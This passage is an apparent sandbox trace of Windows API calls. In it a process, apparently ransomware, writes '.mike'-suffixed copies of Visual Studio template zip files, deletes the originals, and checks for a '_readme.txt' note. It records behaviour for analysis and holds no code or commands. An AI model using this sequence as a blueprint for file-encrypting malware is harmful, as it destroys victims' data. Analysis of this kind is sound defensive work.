8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip", lpFilePart=0x0) returned 0x6d [0128.349] WriteFile (in: hFile=0x288, lpBuffer=0x2216214*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x2216214*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.350] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.mike", lpFilePart=0x0) returned 0x72 [0128.350] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip.mike", lpFilePart=0x0) returned 0x72 [0128.350] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip", dwFileAttributes=0x80) returned 1 [0128.350] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\emptydatabase.zip")) returned 1 [0128.352] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.354] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.354] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.mike", lpFilePart=0x0) returned 0x69 [0128.355] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip", lpFilePart=0x0) returned 0x64 [0128.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.mike", lpFilePart=0x0) returned 0x69 [0128.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.mike", lpFilePart=0x0) returned 0x69 [0128.360] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip", dwFileAttributes=0x80) returned 1 [0128.360] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip")) returned 1 [0128.361] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.363] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.363] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.mike", lpFilePart=0x0) returned 0x6e [0128.363] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip", lpFilePart=0x0) returned 0x69 [0128.367] WriteFile (in: hFile=0x288, lpBuffer=0x22359ac*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x22359ac*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.368] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.mike", lpFilePart=0x0) returned 0x6e [0128.368] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.mike", lpFilePart=0x0) returned 0x6e [0128.368] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip", dwFileAttributes=0x80) returned 1 [0128.369] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip")) returned 1 [0128.370] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.372] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.373] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.mike", lpFilePart=0x0) returned 0x6e [0128.373] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip", lpFilePart=0x0) returned 0x69 [0128.380] WriteFile (in: hFile=0x288, lpBuffer=0x2256750*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x2256750*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.380] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.mike", lpFilePart=0x0) returned 0x6e [0128.380] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.mike", lpFilePart=0x0) returned 0x6e [0128.381] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip", dwFileAttributes=0x80) returned 1 [0128.381] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip")) returned 1 [0128.382] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.384] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.384] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.mike", lpFilePart=0x0) returned 0x6d [0128.385] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip", lpFilePart=0x0) returned 0x68 [0128.389] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.mike", lpFilePart=0x0) returned 0x6d [0128.389] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.mike", lpFilePart=0x0) returned 0x6d [0128.390] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip", dwFileAttributes=0x80) returned 1 [0128.390] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip")) returned 1 [0128.391] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.394] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.394] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.mike", lpFilePart=0x0) returned 0x75 [0128.394] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip", lpFilePart=0x0) returned 0x70 [0128.412] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.mike", lpFilePart=0x0) returned 0x75 [0128.412] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.mike", lpFilePart=0x0) returned 0x75 [0128.412] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip", dwFileAttributes=0x80) returned 1 [0128.413] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip")) returned 1 [0128.414] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.415] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.416] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.mike", lpFilePart=0x0) returned 0x6d [0128.416] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip", lpFilePart=0x0) returned 0x68 [0128.420] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.mike", lpFilePart=0x0) returned 0x6d [0128.420] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.mike", lpFilePart=0x0) returned 0x6d [0128.420] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip", dwFileAttributes=0x80) returned 1 [0128.421] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip")) returned 1 [0128.422] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.424] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.424] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip", lpFilePart=0x0) returned 0x70 [0128.429] WriteFile (in: hFile=0x288, lpBuffer=0x229871c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x229871c*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.430] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip", dwFileAttributes=0x80) returned 1 [0128.431] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip")) returned 1 [0128.437] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.438] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip", lpFilePart=0x0) returned 0x68 [0128.441] WriteFile (in: hFile=0x288, lpBuffer=0x22a776c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x22a776c*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.441] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip", dwFileAttributes=0x80) returned 1 [0128.441] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip")) returned 1 [0128.445] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.445] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip", lpFilePart=0x0) returned 0x6b [0128.451] WriteFile (in: hFile=0x288, lpBuffer=0x22b7c28*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x22b7c28*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.452] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip", dwFileAttributes=0x80) returned 1 [0128.452] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip")) returned 1 [0128.455] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.455] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip", lpFilePart=0x0) returned 0x6a [0128.459] WriteFile (in: hFile=0x288, lpBuffer=0x22c7f84*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x22c7f84*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.459] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip", dwFileAttributes=0x80) returned 1 [0128.460] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip")) returned 1 [0128.463] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 